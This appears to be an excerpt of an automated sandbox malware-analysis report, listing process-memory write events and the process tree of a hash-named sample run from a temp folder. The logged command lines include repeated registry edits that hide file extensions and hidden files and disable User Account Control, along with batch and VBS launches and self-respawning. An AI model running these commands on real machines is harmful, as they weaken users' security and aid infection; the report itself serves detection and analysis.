PID 2864 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 216 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1236 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 3024 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1556 wrote to memory of 3928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\System32\Conhost.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 3024 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

C:\Users\Admin\mSgYkYQw\lWwscwwc.exe

"C:\Users\Admin\mSgYkYQw\lWwscwwc.exe"

C:\ProgramData\RogQUwEA\IOcYUcsQ.exe

"C:\ProgramData\RogQUwEA\IOcYUcsQ.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmAQsAAI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYkMMcsA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bMggAgME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QKgcQMMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dqwcQYEA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JgMIcggY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEsQcwAQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EKcgUEMc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yEQscsUU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xQgIYQow.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RcksAEEw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EYsIAgYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nGcAgMYo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FCssEUcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QAoswYMc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KukkIgUY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

